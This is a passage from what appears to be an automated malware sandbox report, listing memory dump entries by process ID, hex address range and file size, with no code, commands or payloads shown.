                                                                                                                                                                                                                          • memory/2368-123-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                          • memory/2368-296-0x0000000005AE0000-0x0000000005AE1000-memory.dmp
                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                          • memory/2368-299-0x0000000077000000-0x000000007718E000-memory.dmp
                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                            1.6MB

                                                                                                                                                                                                                          • memory/2368-265-0x0000000000AA0000-0x0000000000AA1000-memory.dmp
                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                          • memory/2492-343-0x000000000041A5EA-mapping.dmp
                                                                                                                                                                                                                          • memory/2612-125-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                          • memory/2612-262-0x0000000000B50000-0x0000000000B51000-memory.dmp
                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                          • memory/2612-301-0x0000000005270000-0x0000000005271000-memory.dmp
                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                          • memory/2612-255-0x0000000077000000-0x000000007718E000-memory.dmp
                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                            1.6MB

                                                                                                                                                                                                                          • memory/2636-244-0x0000000077000000-0x000000007718E000-memory.dmp
                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                            1.6MB

                                                                                                                                                                                                                          • memory/2636-280-0x0000000005860000-0x0000000005861000-memory.dmp
                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                          • memory/2636-266-0x0000000000850000-0x0000000000851000-memory.dmp
                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                          • memory/2636-292-0x0000000005790000-0x0000000005791000-memory.dmp
                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                          • memory/2636-118-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                          • memory/2636-272-0x0000000005D60000-0x0000000005D61000-memory.dmp
                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                          • memory/2636-277-0x0000000005710000-0x0000000005711000-memory.dmp
                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                          • memory/2636-290-0x0000000005740000-0x0000000005741000-memory.dmp
                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                          • memory/2680-183-0x00000000007E0000-0x00000000007E1000-memory.dmp
                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                          • memory/2680-121-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                          • memory/2680-208-0x0000000005560000-0x0000000005561000-memory.dmp
                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                          • memory/2680-228-0x0000000005060000-0x000000000555E000-memory.dmp
                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                            5.0MB

                                                                                                                                                                                                                          • memory/2704-180-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                          • memory/3328-172-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                          • memory/3348-169-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                          • memory/3436-182-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                          • memory/3628-336-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                          • memory/3680-114-0x00000000036F0000-0x000000000382F000-memory.dmp
                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                            1.2MB

                                                                                                                                                                                                                          • memory/3776-362-0x0000000000400000-0x00000000023FF000-memory.dmp
                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                            32.0MB

                                                                                                                                                                                                                          • memory/3776-116-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                          • memory/3776-349-0x0000000002650000-0x00000000026ED000-memory.dmp
                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                            628KB

                                                                                                                                                                                                                          • memory/3848-138-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                          • memory/3848-370-0x0000000000400000-0x00000000023AE000-memory.dmp
                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                            31.7MB

                                                                                                                                                                                                                          • memory/3848-358-0x00000000001C0000-0x00000000001C9000-memory.dmp
                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                            36KB

                                                                                                                                                                                                                          • memory/3896-381-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                          • memory/3896-386-0x0000000000400000-0x0000000000414000-memory.dmp
                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                            80KB

                                                                                                                                                                                                                          • memory/3960-354-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                          • memory/3976-357-0x0000000000402FAB-mapping.dmp
                                                                                                                                                                                                                          • memory/3976-361-0x0000000000400000-0x0000000000409000-memory.dmp
                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                            36KB

                                                                                                                                                                                                                          • memory/3992-251-0x000000001B890000-0x000000001B892000-memory.dmp
                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                            8KB

                                                                                                                                                                                                                          • memory/3992-176-0x0000000000D70000-0x0000000000D71000-memory.dmp
                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                          • memory/3992-122-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                          • memory/3992-231-0x00000000014A0000-0x00000000014BC000-memory.dmp
                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                            112KB

                                                                                                                                                                                                                          • memory/4080-347-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                          • memory/4112-376-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                          • memory/4112-380-0x0000000000400000-0x0000000000414000-memory.dmp
                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                            80KB

                                                                                                                                                                                                                          • memory/4240-378-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                          • memory/4324-225-0x0000000000400000-0x0000000000414000-memory.dmp
                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                            80KB

                                                                                                                                                                                                                          • memory/4324-209-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                          • memory/4364-401-0x000000000041A772-mapping.dmp
                                                                                                                                                                                                                          • memory/4416-218-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                          • memory/4436-384-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                          • memory/4484-375-0x0000000000400000-0x0000000000414000-memory.dmp
                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                            80KB

                                                                                                                                                                                                                          • memory/4484-369-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                          • memory/4548-327-0x0000000003AD0000-0x0000000003AD1000-memory.dmp
                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                          • memory/4548-356-0x0000000003B10000-0x0000000003B11000-memory.dmp
                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                          • memory/4548-365-0x0000000003B40000-0x0000000003B41000-memory.dmp
                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                          • memory/4548-383-0x0000000003B80000-0x0000000003B81000-memory.dmp
                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                          • memory/4548-318-0x0000000003AC0000-0x0000000003AC1000-memory.dmp
                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                          • memory/4548-341-0x0000000003AF0000-0x0000000003AF1000-memory.dmp
                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                          • memory/4548-364-0x0000000003B30000-0x0000000003B31000-memory.dmp
                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                          • memory/4548-344-0x0000000003B00000-0x0000000003B01000-memory.dmp
                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                          • memory/4548-377-0x0000000003B70000-0x0000000003B71000-memory.dmp
                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                          • memory/4548-285-0x00000000001E0000-0x00000000001E1000-memory.dmp
                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                          • memory/4548-306-0x0000000005010000-0x0000000005011000-memory.dmp
                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                          • memory/4548-250-0x0000000003920000-0x000000000395C000-memory.dmp
                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                            240KB

                                                                                                                                                                                                                          • memory/4548-366-0x0000000003B50000-0x0000000003B51000-memory.dmp
                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                          • memory/4548-315-0x0000000003AB0000-0x0000000003AB1000-memory.dmp
                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                          • memory/4548-232-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                          • memory/4548-389-0x0000000003B90000-0x0000000003B91000-memory.dmp
                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                          • memory/4548-305-0x0000000005000000-0x0000000005001000-memory.dmp
                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                          • memory/4548-363-0x0000000003B20000-0x0000000003B21000-memory.dmp
                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                          • memory/4548-367-0x0000000003B60000-0x0000000003B61000-memory.dmp
                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                          • memory/4548-310-0x0000000003AA0000-0x0000000003AA1000-memory.dmp
                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                          • memory/4548-337-0x0000000003AE0000-0x0000000003AE1000-memory.dmp
                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                          • memory/4608-235-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                          • memory/4692-243-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                          • memory/4692-254-0x0000000000030000-0x0000000000033000-memory.dmp
                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                            12KB

                                                                                                                                                                                                                          • memory/4740-329-0x0000016F30AE0000-0x0000016F30B4F000-memory.dmp
                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                            444KB

                                                                                                                                                                                                                          • memory/4740-332-0x0000016F30B50000-0x0000016F30C1F000-memory.dmp
                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                            828KB

                                                                                                                                                                                                                          • memory/4740-247-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                          • memory/4748-382-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                          • memory/4936-350-0x0000000000400000-0x000000000041B000-memory.dmp
                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                            108KB

                                                                                                                                                                                                                          • memory/4936-345-0x00000000004057F0-mapping.dmp
                                                                                                                                                                                                                          • memory/5076-388-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                          • memory/5116-338-0x0000000004D50000-0x0000000005356000-memory.dmp
                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                            6.0MB

                                                                                                                                                                                                                          • memory/5116-314-0x000000000041A616-mapping.dmp
                                                                                                                                                                                                                          • memory/5192-391-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                          • memory/5256-393-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                          • memory/5276-394-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                          • memory/5340-399-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                          • memory/5420-403-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                          • memory/5440-417-0x000000000041A616-mapping.dmp
                                                                                                                                                                                                                          • memory/5448-405-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                          • memory/5528-409-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                          • memory/5540-410-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                          • memory/5612-415-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                          • memory/5828-429-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                          • memory/5964-435-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                          • memory/6068-440-0x0000000000000000-mapping.dmp